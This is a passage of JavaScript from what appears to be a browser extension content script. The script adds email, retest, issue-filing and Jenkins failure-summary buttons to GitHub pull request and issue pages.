+ jenkinsReloadableInfoClassName).remove(); } addTestFailureButtonsAndDescriptions(currentSettings); if (currentSettings[option_jenkinsShowRunTime]) { addJenkinsTestRunTimes(); } if (currentSettings[option_jenkinsShowRunTime] || currentSettings[option_jenkinsShowFailureIndications] || currentSettings[option_jenkinsShowBugFilingButton] || currentSettings[option_jenkinsShowRetestButton]) { addJenkinsRefreshButton(currentSettings); } } // Globals var currentPageFullUrl; var postDomainUrlParts; var currentPageOrg; var currentPageRepo; var isIndividualItemPage; var individualItemPageTitleElement; var isListPage; var itemListElement; function resetGlobals() { log("Resetting globals"); log("Clearing old globals"); currentPageFullUrl = null; postDomainUrlParts = null; currentPageOrg = null; currentPageRepo = null; isIndividualItemPage = null; individualItemPageTitleElement = null; isListPage = null; itemListElement = null; log("Setting new globals"); currentPageFullUrl = window.location.href; log("currentPageFullUrl: " + currentPageFullUrl); var urlParts = normalizeAndRemoveUrlParameters(currentPageFullUrl).split("/"); var indexOfGitHubDotCom = -1; for (var i = 0; i < urlParts.length; i++) { if (urlParts[i].indexOf("github.com") > -1) { indexOfGitHubDotCom = i; break; } } if (indexOfGitHubDotCom > -1) { postDomainUrlParts = urlParts.slice(indexOfGitHubDotCom + 1, urlParts.length); log("postDomainUrlParts: " + postDomainUrlParts.toString()); var org = urlParts[indexOfGitHubDotCom + 1]; var repo = urlParts[indexOfGitHubDotCom + 2]; log("ASDF" + repo); if (typeof org !== "undefined") { if (org == "pulls") { // Personal pulls page: github.com/pulls... // Handled below, but don't treat "pulls" as the organization } else { // Organization sub-page: github.com/dotnet... currentPageOrg = org; } } log("currentPageOrg: " + currentPageOrg); if (typeof repo !== "undefined") { // Repository sub-page: github.com/dotnet/roslyn... currentPageRepo = repo; } log("currentPageRepo: " + currentPageRepo); individualItemPageTitleElement = document.getElementsByClassName("js-issue-title")[0]; isIndividualItemPage = typeof individualItemPageTitleElement !== 'undefined'; log("isIndividualItemPage: " + isIndividualItemPage); itemListElement = document.getElementsByClassName("table-list-issues")[0]; isListPage = typeof itemListElement !== 'undefined'; log("isListPage: " + isListPage); } } function logfailure(err) { log("ERROR - " + err); log("ERROR STACK - " + err.stack); } function log(message) { console.log("StashPop: " + message); } function addButtonsToIndividualItemPage(title, number, isPull, currentSettings) { if ((isPull && currentSettings[option_emailPullRequest]) || (!isPull && currentSettings[option_emailIssue])) { var buttonsContainer = document.createElement("div"); buttonsContainer.setAttribute("class", stashPopClassName); var emailButton = createButtonWithCallBack( isPull ? 
"Email PR" : "Email Issue", function () { log("Email Item clicked"); sendmail(number, title, isPull); }); buttonsContainer.appendChild(emailButton); if (!isPull) { var workItemButton = createButtonWithCallBack( "Copy as WorkItem Attribute", function () { log("Copy as WorkItem Attribute clicked"); copyTextToClipboard('<WorkItem(' + number + ', "' + window.location.href + '")>'); }); workItemButton.style.margin = "0px 0px 0px 4px"; buttonsContainer.appendChild(workItemButton); } individualItemPageTitleElement.parentNode.appendChild(buttonsContainer); } } function addButtonsToListPage(isPull, currentSettings) { if ((isPull && currentSettings[option_emailPullRequestList]) || (!isPull && currentSettings[option_emailIssuesList])) { var numberOfCheckedItemsElement = document.getElementsByClassName("js-check-all-count")[0]; if (typeof numberOfCheckedItemsElement !== "undefined") { var buttonAll = createButtonWithCallBack( "Email Selected " + (isPull ? "PRs" : "Issues"), function () { log("Email Selected Items clicked"); sendmultimail(itemListElement, isPull); }); buttonAll.className = "btn btn-sm"; numberOfCheckedItemsElement.parentNode.insertBefore(buttonAll, numberOfCheckedItemsElement.parentNode.firstChild); } for (var i = 0; i < itemListElement.children.length; i++) { var itemElement = itemListElement.children[i]; var titleElement = itemElement.getElementsByClassName("issue-title")[0]; var urlParts = titleElement.getElementsByClassName("issue-title-link")[0].href.split("/"); var issueNumber = urlParts[urlParts.length - 1]; var issueTitle = titleElement.getElementsByClassName("issue-title-link")[0].innerHTML; (function () { var _issueNumber = issueNumber; var _issueTitle = issueTitle; var emailButton = createButtonWithCallBack( isPull ? "Email PR" : "Email Issue", function () { log("Email Item clicked"); sendmail(_issueNumber, _issueTitle, isPull); }); emailButton.className = "btn btn-sm " + stashPopClassName; titleElement.insertBefore(emailButton, titleElement.firstChild); })(); } } if (isPull && currentSettings[option_jenkinsOfferInlineFailuresOnPRList]) { log("Handling failures in PR list"); var failureTitles = new Array(); var failureClassNames = new Array(); var failureIndices = new Array(); for (var i = 0; i < itemListElement.children.length; i++) { var itemElement = itemListElement.children[i]; if (typeof itemElement.getElementsByClassName("octicon-x")[0] !== "undefined") { // PR with failures log("Found a failure"); var titleElement = itemElement.getElementsByClassName("issue-title")[0]; var pullRequestElement = itemElement.getElementsByClassName("issue-title")[0]; // On github.com/pulls there are two "issue-title-link" elements. The first is for the repo, the second for the issue. // Get the issue number, then add the repo qualifier if necessary. 
var pullRequestUrlParts = pullRequestElement.getElementsByClassName("issue-title-link js-navigation-open")[0].href.split("/"); log("PR Request Parts: " + pullRequestUrlParts.toString()); var pullRequestNumber = pullRequestUrlParts[pullRequestUrlParts.length - 1]; log("In PR #" + pullRequestNumber); var pullRequestRepo = ""; if (currentPageOrg == null) { var prOrg = pullRequestUrlParts[pullRequestUrlParts.length - 4]; var prRepo = pullRequestUrlParts[pullRequestUrlParts.length - 3]; pullRequestRepo = prOrg + "_ClassNameFriendlySeparator_" + prRepo; log("In Repo: " + pullRequestRepo); } var pullRequestIdentifier = pullRequestRepo + pullRequestNumber; log("Failure identifier: " + pullRequestIdentifier); var showJenkinsFailureLink = document.createElement("a"); showJenkinsFailureLink.href = "#"; var className = "loadjenkinsfailure" + pullRequestIdentifier; showJenkinsFailureLink.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " " + className; showJenkinsFailureLink.text = "Show Jenkins failure"; showJenkinsFailureLink.style.color = 'red'; log("titleElement:" + titleElement); log("showJenkinsFailureLink:" + showJenkinsFailureLink); titleElement.appendChild(showJenkinsFailureLink); failureTitles.push(titleElement); failureClassNames.push(className); failureIndices.push(i); (function () { var _titleElement = titleElement; var _className = className; var _i = i; log("Hooking up click event for class " + _className); $('.' + _className).click(function (e) { e.preventDefault(); log("Click - Load Jenkins Failure for #" + _className.substring("loadjenkinsfailure".length)); inlineFailureInfoToPRList(_titleElement, _className, _i, currentSettings); }); })(); } } if (failureTitles.length >= 1) { var headerStates = document.getElementsByClassName("table-list-header-toggle states")[0]; var loadAllFailuresLink = document.createElement("a"); loadAllFailuresLink.href = "#"; loadAllFailuresLink.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " loadalljenkinsfailures"; loadAllFailuresLink.text = "Show all Jenkins failures"; loadAllFailuresLink.style.color = 'red'; headerStates.appendChild(loadAllFailuresLink); $('.loadalljenkinsfailures').click(function (e) { log("Click - Load All Jenkins Failures") e.preventDefault(); for (var i = 0; i < failureTitles.length; i++) { inlineFailureInfoToPRList(failureTitles[i], failureClassNames[i], failureIndices[i], currentSettings); } }); } } } function createCommentSettingLink(title, comment, color) { return createLinkWithCallBack( title, function () { var commentText = comment + "\n"; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); return false; }, color); } function createLinkWithCallBack(title, callback, color) { color = color || "#4078c0"; var a = document.createElement("a"); a.text = title; a.role = "button"; a.href = ""; a.style.marginRight = "5px"; a.style.color = color; a.onclick = callback; return a; } function createRequestJenkinsAccessLinkWithCallbackIfAllowed(url, callback) { return createLinkWithCallBack( "Grant StashPop access", function () { log("Allow/request access button clicked for " + url + ". 
Sending request..."); executeCallbackIfUrlAccessGranted(url, callback); return false; }); } function executeCallbackIfUrlAccessGranted(url, callback) { log("Requesting access for " + url + "..."); chrome.runtime.sendMessage({ method: "requestOriginAccess", keys: [url] }, function (response) { if (response) { log(" Access granted. Executing callback."); callback(); } else { log(" Access denied."); } }); } function createButtonWithCallBack(title, callback) { var button = document.createElement("input"); button.setAttribute("type", "button"); button.setAttribute("value", title); button.onclick = callback; return button; } // Copy provided text to the clipboard. function copyTextToClipboard(text) { var copyFrom = $('<textarea/>'); copyFrom.text(text); $('body').append(copyFrom); copyFrom.select(); document.execCommand('copy'); copyFrom.remove(); } // TODO: Only scrape once between this and addTestFailureButtonsAndDescriptions function addJenkinsTestRunTimes() { var testRuns = document.getElementsByClassName("build-status-item"); for (var i = 0; i < testRuns.length; i++) { var run = testRuns[i]; var detailsLink = run.getElementsByClassName("build-status-details")[0]; if (typeof detailsLink === 'undefined') { continue; } var textToUpdate = run.getElementsByClassName("text-muted")[0]; var loading = document.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var specificClassName = stashPopClassName + "_TestRunTime_" + i; loading.className = stashPopClassName + " " + specificClassName; textToUpdate.appendChild(loading); (function (_run, _url, _specificClassName) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _url, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var header = doc.getElementsByClassName("build-caption page-headline")[0]; if (typeof header === "undefined") { $('.' + _specificClassName).remove(); return; } var timestamp = header.innerText.split("(")[1].split(")")[0]; var timestampMoment = moment(timestamp); var dayCount = moment().diff(timestampMoment, 'days', true); var backgroundColor = "#000000"; if (dayCount <= 2) { backgroundColor = "#AAFFAA"; } // green else if (dayCount <= 5) { backgroundColor = "#FFC85A"; } // yellow else { backgroundColor = "#FFAAAA"; } // red $('.' 
+ _specificClassName).remove(); var textToUpdate = _run.getElementsByClassName("text-muted")[0]; var span = document.createElement("span"); span.innerHTML = "(" + timestampMoment.fromNow() + ")"; span.style.backgroundColor = backgroundColor; span.setAttribute("title", timestamp + "\n\nGreen: < 2 days\nYellow: 2 to 5 days\nRed: > 5 days"); span.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; textToUpdate.appendChild(span); }); })(run, detailsLink.href, specificClassName); } } function addTestFailureButtonsAndDescriptions(currentSettings) { if (currentSettings[option_jenkinsShowBugFilingButton] || currentSettings[option_jenkinsShowRetestButton] || currentSettings[option_jenkinsShowFailureIndications]) { processTestFailures( document, null, 0, currentSettings["jenkinsShowBugFilingButton"], currentSettings["jenkinsShowFailureIndications"], currentSettings["jenkinsShowTestFailures"], currentSettings["jenkinsShowRetestButton"], function (x, y, z, w) { }, currentSettings); } } function processTestFailures(doc, prLoadingDiv, rowNumber, jenkinsShowBugFilingButton, jenkinsShowFailureIndications, jenkinsShowTestFailures, jenkinsShowRetestButton, callbackWhenTestProcessed, currentSettings) { var testFailures = doc.getElementsByClassName("octicon-x build-status-icon"); if (typeof prLoadingDiv !== "undefined" && prLoadingDiv !== null) { // Delete the existing loading icon while (prLoadingDiv.firstChild) { prLoadingDiv.removeChild(prLoadingDiv.firstChild); } // Drop in a bunch of new loading icons for (var i = 0; i < testFailures.length; i++) { var isDropdown = false; var ancestor = testFailures[i]; while ((ancestor = ancestor.parentElement) != null) { if (ancestor.classList.contains("dropdown-menu")) { isDropdown = true; break; } } if (isDropdown) { continue; } var div = document.createElement("div"); var specificClassName = stashPopClassName + "_ActualTestFailureHolder_" + rowNumber + "_" + i; div.className = stashPopClassName + " " + specificClassName; div.style.color = "#000000"; var loading = doc.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var testFailure = testFailures[i]; var queueName = testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var t = document.createTextNode("Processing failed queue '" + queueName + "'..."); div.appendChild(loading); div.appendChild(t); prLoadingDiv.appendChild(div); } } if (!isListPage) { var nonDefaultTestInfo = currentSettings[option_nonDefaultTestInfo]; var nonDefaultTests = nonDefaultTestInfo.trim().match(/[^\r\n]+/g); var relevantNonDefaultTests = new Array(); log("Calculating relevant non-default test suites...") for (var i = 0; i < nonDefaultTests.length; i++) { log(" Considering: " + nonDefaultTests[i]) var specParts = nonDefaultTests[i].trim().split(":"); if (specParts.length == 2 || specParts.length == 3) { var scope = specParts[0].trim(); var testToRun = specParts[1].trim(); var runIfNotAlreadyRun = specParts.length == 3 ? specParts[2].trim() : testToRun; var scopeParts = scope.trim().split("/"); if (scopeParts.length == 1 || scopeParts.length == 2) { var orgToMatch = scopeParts[0].trim(); if (orgToMatch == currentPageOrg) { var repoToMatch = scopeParts.length == 2 ? 
scopeParts[1].trim() : ""; if (scopeParts.length == 1 || repoToMatch == currentPageRepo) { log(" It matches, adding mapping from " + runIfNotAlreadyRun + " to " + testToRun); relevantNonDefaultTests[runIfNotAlreadyRun] = testToRun; } } } } } var nonDefaultTestCount = 0; for (var key in relevantNonDefaultTests) { nonDefaultTestCount++; } log("relevantNonDefaultTests length: " + nonDefaultTestCount); log("Removing already-run tests...") var buildStatusList = $(".build-statuses-list:visible")[0]; if (typeof buildStatusList !== "undefined") { for (var i = 0; i < buildStatusList.children.length; i++) { var individualStatus = buildStatusList.children[i]; var queueName = individualStatus.getElementsByTagName("strong")[0].innerText.trim(); log(" Trying to delete: " + queueName); delete relevantNonDefaultTests[queueName]; } nonDefaultTestCount = 0; for (var key in relevantNonDefaultTests) { nonDefaultTestCount++; } log("Updated relevantNonDefaultTests length: " + nonDefaultTestCount); if (nonDefaultTestCount > 0) { var additionalJobsDiv = doc.createElement("div"); additionalJobsDiv.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; var t = document.createTextNode("Run non-default tests: "); additionalJobsDiv.appendChild(t); for (var key in relevantNonDefaultTests) { var value = relevantNonDefaultTests[key]; (function () { var jobName = value; var jobButton = createButtonWithCallBack( jobName, function () { var commentText = "retest " + jobName + " please\n"; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); }); jobButton.className = "btn btn-sm"; additionalJobsDiv.appendChild(jobButton); })(); } buildStatusList.previousSibling.previousSibling.appendChild(additionalJobsDiv); } } } for (var i = 0; i < testFailures.length; i++) { var isDropdown = false; var ancestor = testFailures[i]; while ((ancestor = ancestor.parentElement) != null) { if (ancestor.classList.contains("dropdown-menu")) { isDropdown = true; break; } } if (isDropdown) { continue; } var testFailure = testFailures[i]; var testFailUrl = testFailure.parentNode.getElementsByClassName("build-status-details")[0].href; var queueName = testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var loading = doc.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var specificClassNameForJenkinsFailureRedAreaLoader = stashPopClassName + "_TestFailures_" + i; loading.className = stashPopClassName + " " + specificClassNameForJenkinsFailureRedAreaLoader; testFailure.parentNode.insertBefore(loading, testFailure.parentNode.firstChild); var specificClassNameForPRListFailure = stashPopClassName + "_ActualTestFailureHolder_" + rowNumber + "_" + i; (function (_testFailure, _testFailUrl, _specificClassNameForPRListFailure, _specificClassNameForJenkinsFailureRedAreaLoader, _queueName) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _testFailUrl, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var h2elements = doc.getElementsByTagName("h2"); var aelements = doc.getElementsByTagName("a"); var url = window.location.href; var urlParts = url.split("/"); var pullNumber = urlParts[urlParts.length - 1]; var 
pullTitle = ""; if (typeof document.getElementsByClassName("js-issue-title")[0] !== "undefined") { pullTitle = document.getElementsByClassName("js-issue-title")[0].innerText.trim(); } var pullAuthor = ""; if (typeof document.getElementsByClassName("pull-header-username")[0] !== "undefined") { pullAuthor = document.getElementsByClassName("pull-header-username")[0].innerText.trim(); } var issueBody = "PR: [#" + pullNumber + "](" + url + ") *" + pullTitle + "* by @" + pullAuthor + "\r\n"; issueBody = issueBody + "Failure: " + _testFailUrl + "\r\n\r\n"; var htmlDescription = ""; var issueDescription = "<description>"; if (jenkinsShowFailureIndications) { if (jenkinsShowTestFailures) { for (var i = 0; i < aelements.length; i++) { var aelement = aelements[i]; if (aelement.innerText == "Test Result" && aelement.parentNode.tagName == "TD") { var unitTestFailures = aelement.parentNode.getElementsByTagName("li"); if (unitTestFailures.length > 0) { if (unitTestFailures.length <= 10) { htmlDescription = htmlDescription + "<b>" + unitTestFailures.length + " Test Failures:</b><br />"; issueBody = issueBody + "**" + unitTestFailures.length + " Test Failures:**\r\n"; } else { htmlDescription = htmlDescription + "<b>" + unitTestFailures.length + " Test Failures:</b> (showing first 10)<br />"; issueBody = issueBody + "**" + unitTestFailures.length + " Test Failures:** (showing first 10)\r\n"; } } for (var j = 0; j < unitTestFailures.length && j < 10; j++) { var unitTestFailure = unitTestFailures[j]; htmlDescription = htmlDescription + "&nbsp;&nbsp;&nbsp;&nbsp;" + unitTestFailure.innerText + "<br />"; issueBody = issueBody + unitTestFailure.innerText + "\r\n"; } htmlDescription = htmlDescription + "<br />"; issueBody = issueBody + "\r\n"; } } } var count = 1; for (var i = 0; i < h2elements.length; i++) { var h2 = h2elements[i]; if (h2.innerHTML == "HTTP ERROR 404") { htmlDescription = htmlDescription + "404: Build details page could not be found."; issueDescription = "404: Build details page could not be found."; } if (h2.innerHTML == "Identified problems") { var nodeWithErrorSiblings = h2.parentNode.parentNode; var errorRow = nodeWithErrorSiblings; while ((errorRow = errorRow.nextSibling) != null) { if (count > 1) { issueBody = issueBody + "\r\n\r\n"; htmlDescription = htmlDescription + "<br /><br />"; } var failureTitle = ""; var failureDescription = ""; var h3s = errorRow.getElementsByTagName("h3"); var h4s = errorRow.getElementsByTagName("h4"); if (h3s.length > 0) { failureTitle = h3s[0].innerHTML.split("<br")[0].trim(); failureDescription = h3s[0].getElementsByTagName("b")[0].innerHTML.trim(); } else if (h4s.length > 0) { failureTitle = h4s[0].innerHTML.trim(); failureDescription = h4s[1].innerHTML.trim(); } if (count == 1) { issueDescription = failureTitle; } issueBody = issueBody + "**Issue " + count + ": " + failureTitle + "**\r\n"; issueBody = issueBody + failureDescription; htmlDescription = htmlDescription + "<b>Issue " + count + ": " + failureTitle + "</b><br />" + failureDescription; count++; } } } if (count > 2) { issueDescription = issueDescription + " (+" + (count - 2) + " more)"; } if (count == 1) { // we failed to find the failure, or there was none. // should we add special handling here? 
} } var testQueueName = _testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var issueTitle = "[Test Failure] " + issueDescription + " in " + testQueueName + " on PR #" + pullNumber; var issueCreationRouting = currentSettings[option_issueCreationRouting]; var issueRoutes = issueCreationRouting.trim().match(/[^\r\n]+/g); var targetOrg = currentPageOrg; var targetRepo = currentPageRepo; for (var routeNum = 0; routeNum < issueRoutes.length; routeNum++) { var routeParts = issueRoutes[routeNum].trim().split(":"); var fromParts = routeParts[0].trim().split("/"); var toParts = routeParts[1].trim().split("/"); if (fromParts.length == 2 && toParts.length == 2 && fromParts[0].trim() == currentPageOrg && fromParts[1].trim() == currentPageRepo) { targetOrg = toParts[0].trim(); targetRepo = toParts[1].trim(); break; } } var previousFailureUrl = _testFailUrl; var defaultIssueLabelsSpecs = currentSettings[option_defaultIssueLabels].trim().match((/[^\r\n]+/g)); log("Determining issue labels...") var labelsToUse = new Array(); for (var specNum = 0; specNum < defaultIssueLabelsSpecs.length; specNum++) { log(" Checking: " + defaultIssueLabelsSpecs[specNum]); var specParts = defaultIssueLabelsSpecs[specNum].trim().split(":"); var scopeParts = specParts[0].split("/"); var organization = scopeParts[0].trim(); if (organization == currentPageOrg) { if (scopeParts.length == 1 || scopeParts[1].trim() == currentPageRepo) { var labelList = specParts[1].trim().split(","); log(" Matches. Adding " + labelList.toString()); for (var labelNum = 0; labelNum < labelList.length; labelNum++) { labelName = labelList[labelNum].trim(); if (!(labelName in labelsToUse)) { log(" Actually adding: " + labelName); labelsToUse.push(labelName); } } } } } log("Calculated labelsToUse: " + labelsToUse); // "&labels[]=Area-Infrastructure&labels[]=Contributor%20Pain" var labelUrlPart = ""; if (labelsToUse.length > 0) { for (var labelNum = 0; labelNum < labelsToUse.length; labelNum++) { labelUrlPart = labelUrlPart + "&labels[]=" + labelsToUse[labelNum]; } } log("Constructed labels url part: " + labelUrlPart); var url = "https://github.com/" + targetOrg + "/" + targetRepo + "/issues/new?title=" + encodeURIComponent(issueTitle) + "&body=" + encodeURIComponent(issueBody) + labelUrlPart; var jobName = testQueueName; var retestButton = doc.createElement("input"); retestButton.setAttribute("type", "button"); retestButton.setAttribute("value", "Retest"); retestButton.setAttribute("name", "buttonname"); retestButton.onclick = (function () { var thisUrl = url; var thisJobName = jobName; var thisPreviousFailureUrl = previousFailureUrl; return function () { log("Finding retest text"); var rerunTextEntries = currentSettings[option_testRerunText].trim().match((/[^\r\n]+/g)); // * = 1, org = 2, repo = 3 var bestMatchLevel = 0; var descriptor = "retest {0} please"; for (var rerunTextNum = 0; rerunTextNum < rerunTextEntries.length; rerunTextNum++) { log(" Considering " + rerunTextEntries[rerunTextNum].trim()); var rerunEntryParts = rerunTextEntries[rerunTextNum].trim().split(":"); var scope = rerunEntryParts[0].trim(); var matchLevel = 0; var entryMatches = false; if (scope == "*") { matchLevel = 1; entryMatches = true; } else if (scope.indexOf("/") == -1) { matchLevel = 2; entryMatches = scope == currentPageOrg; } else { matchLevel = 3; var org = scope.split("/")[0]; var repo = scope.split("/")[1]; entryMatches = org == currentPageOrg && repo == currentPageRepo; } log(" Matches / Level: " + entryMatches + "/" + matchLevel); 
if (entryMatches && matchLevel > bestMatchLevel) { var descriptor = rerunEntryParts[1].trim(); log(" Setting new best match to: " + descriptor); } } log("Best-match retest text: " + descriptor); var commentText = ""; if (descriptor.indexOf("{0}") == -1) { commentText = descriptor; log(" No placeholder, so commentText is " + commentText); } else { var placeholderLocation = descriptor.indexOf("{0}"); var commentTextStart = descriptor.substr(0, placeholderLocation); var commentTextEnd = descriptor.substr(placeholderLocation + "{0}".length); var commentText = commentTextStart + thisJobName + commentTextEnd; log(" commentText with filled placeholder is " + commentText); } commentText = commentText + "\n// Previous failure: " + thisPreviousFailureUrl + "\n// Retest reason: "; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); }; })(); retestButton.className = "btn btn-sm " + stashPopClassName + " " + jenkinsReloadableInfoClassName; retestButton.style.margin = "0px 0px 3px 0px"; if (jenkinsShowRetestButton) { _testFailure.parentNode.insertBefore(retestButton, _testFailure.parentNode.firstChild); } var button = doc.createElement("input"); button.setAttribute("type", "button"); button.setAttribute("value", "Create Issue"); button.setAttribute("name", "buttonname"); button.onclick = (function () { var thisUrl = url; return function () { window.open(thisUrl); }; })(); button.className = "btn btn-sm " + stashPopClassName + " " + jenkinsReloadableInfoClassName; button.style.margin = "0px 0px 3px 0px"; if (jenkinsShowBugFilingButton) { _testFailure.parentNode.insertBefore(button, _testFailure.parentNode.firstChild); } if (jenkinsShowFailureIndications) { executeCallbackIfPermissionPresent(_testFailUrl, function () { var div = doc.createElement("div"); if (typeof htmlDescription === "undefined" || htmlDescription == "") { htmlDescription = "Unknown Failure - If this is a private Jenkins job, click the 'Details' button to reauthenticate and then reload this failure data."; } div.innerHTML = htmlDescription.trim(); div.style.backgroundColor = "#FFAAAA"; div.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; _testFailure.parentNode.appendChild(div); }); } $("." 
+ _specificClassNameForJenkinsFailureRedAreaLoader).remove(); callbackWhenTestProcessed(_queueName, _testFailUrl, htmlDescription, _specificClassNameForPRListFailure); }); })(testFailure, testFailUrl, specificClassNameForPRListFailure, specificClassNameForJenkinsFailureRedAreaLoader, queueName); } } function makeBuildStatusWindowsBig() { var lists = document.getElementsByClassName("build-statuses-list"); for (var i = 0; i < lists.length; i++) { lists[i].style.maxHeight = "5000px"; } } function addJenkinsRefreshButton(currentSettings) { var lists = $(".build-statuses-list"); for (var i = 0; i < lists.length; i++) { var list = lists[i]; var a = document.createElement("a"); a.href = "#"; a.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " jenkinsreload"; a.text = "Reload Jenkins data"; list.previousSibling.previousSibling.appendChild(a); } $('.jenkinsreload').click(function (e) { e.preventDefault(); reloadJenkins(currentSettings); }); } function normalizeAndRemoveUrlParameters(str) { str = stripFragment(str); str = stripQueryString(str); return stripTrailingSlash(str); } function stripTrailingSlash(str) { return str.substr(-1) === '/' ? str.substring(0, str.length - 1) : str; } function stripQueryString(str) { return str.indexOf('?') >= 0 ? str.substring(0, str.indexOf('?')) : str; } function stripFragment(str) { return str.indexOf('#') >= 0 ? str.substring(0, str.indexOf('#')) : str; } function inlineFailureInfoToPRList(title, className, i, currentSettings) { var clickToLoadText = title.getElementsByClassName(className)[0]; if (typeof clickToLoadText === "undefined") { // Already expanded. Don't re-expand. return; } $("." + className).remove(); log("Inlining Jenkins failures to PR list for " + className + " (position " + i + " on this page)"); // On github.com/pulls there are two "issue-title-link" elements. 
var thisFailureUrl = title.getElementsByClassName("issue-title-link js-navigation-open")[0].href; log("thisFailureUrl:" + thisFailureUrl); executeCallbackIfUrlAccessGranted(thisFailureUrl, function () { var redDiv = document.createElement("div"); redDiv.style.backgroundColor = "#FFAAAA"; redDiv.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; var loading = document.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var prLoadingDiv = document.createElement("div"); prLoadingDiv.style.backgroundColor = "#FFAAAA"; prLoadingDiv.style.color = "#000000"; prLoadingDiv.appendChild(loading); var t = document.createTextNode("Loading PR contents..."); prLoadingDiv.appendChild(t); var specificClassName = stashPopClassName + "_LoadPRContents_" + i; prLoadingDiv.className = specificClassName; redDiv.appendChild(prLoadingDiv); (function (_thisFailureUrl, _divToAddTo, _prLoadingDiv) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _thisFailureUrl, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); processTestFailures( doc, _prLoadingDiv, i, true, true, true, true, function (failurequeue, detailsurl, resultstr, classNameToPlaseResultsIn) { var divToPlaceResultsIn = document.getElementsByClassName(classNameToPlaseResultsIn)[0]; while (divToPlaceResultsIn.firstChild) { divToPlaceResultsIn.removeChild(divToPlaceResultsIn.firstChild); } var _individualFailureDiv = document.createElement("div"); var _span = document.createElement("span"); _span.innerHTML = "<b><u>" + failurequeue + "</u></b> <a href = '" + encodeURI(detailsurl) + "' target='_blank'>Details</a><br />"; _individualFailureDiv.appendChild(_span); var _nestedDiv = document.createElement("div"); _nestedDiv.style.padding = "0px 0px 0px 30px"; var _span2 = document.createElement("span"); _span2.innerHTML = resultstr + "<br /><br />"; _nestedDiv.appendChild(_span2); _individualFailureDiv.appendChild(_nestedDiv); _individualFailureDiv.style.color = "#000000"; divToPlaceResultsIn.appendChild(_individualFailureDiv); }, currentSettings); }); })(thisFailureUrl, redDiv, prLoadingDiv); title.appendChild(redDiv); }); } function executeCallbackIfPermissionPresent(url, callback) { log("Checking access for " + url + "..."); chrome.runtime.sendMessage({ method: "checkOriginAccess", keys: [url] }, function (response) { if (response) { log(" Permission present. Executing callback."); callback(); } else { log(" Permission missing."); } }); } function executeCallbackIfPermissionMissing(url, callback) { log("Checking access for " + url + "..."); chrome.runtime.sendMessage({ method: "checkOriginAccess", keys: [url] }, function (response) { if (response) { log(" Permission present."); } else { log(" Permission missing. 
Executing callback."); callback(); } }); } function openJenkinsDetailsInNewTab(currentSettings) { var detailsLinks = document.getElementsByClassName("build-status-details"); for (var i = 0; i < detailsLinks.length; i++) { var detailsLink = detailsLinks[i]; detailsLink.target = "_blank"; (function (_detailsLink) { executeCallbackIfPermissionMissing( detailsLink.href, function () { var grantAccessLink = createRequestJenkinsAccessLinkWithCallbackIfAllowed( _detailsLink.href, function () { reloadJenkins(false, currentSettings); return false; }); grantAccessLink.className = "build-status-details right"; _detailsLink.parentNode.insertBefore(grantAccessLink, _detailsLink.nextSibling); }) })(detailsLink); } } function addCodeReviewSummaryAndButtons(codeReviewOptions) { var splitCodeOptions = codeReviewOptions.split(";"); var positiveIndicatorsString = splitCodeOptions[1].trim(); var negativeIndicatorsString = splitCodeOptions[2].trim(); var testedIndicatorsString = splitCodeOptions[3].trim(); if (positiveIndicatorsString.length == 0 && negativeIndicatorsString.length == 0 && testedIndicatorsString.length == 0) { log("Empty code review options. Bail.") return; } // Buttons var btnList = document.getElementById("partial-new-comment-form-actions"); var text = document.createElement("font"); text.color = "#666666"; text.textContent = "Code Review: "; btnList.appendChild(text); var positiveIndicators = positiveIndicatorsString.split(","); var negativeIndicators = negativeIndicatorsString.split(","); var testedIndicators = testedIndicatorsString.split(","); if (positiveIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Approve", positiveIndicators[0], "#00aa00")); } if (negativeIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Reject", negativeIndicators[0], "#aa0000")); } if (testedIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Tested", testedIndicators[0])); } // Reviews var positiveReviews = new Array(); var negativeReviews = new Array(); var testReviews = new Array(); var comments = document.getElementsByClassName("timeline-comment-wrapper"); for (var i = 0; i < comments.length; i++) { var comment = comments[i]; if (comment.classList.contains("timeline-new-content")) { continue; } // TODO: exclude "email-hidden-reply", example https://github.com/mono/mono/pull/2420 var body = comment.children[1].getElementsByClassName("js-comment-body")[0]; if (typeof body !== "undefined") { var bodyHtml = body.innerHTML; if (positiveIndicatorsString.length > 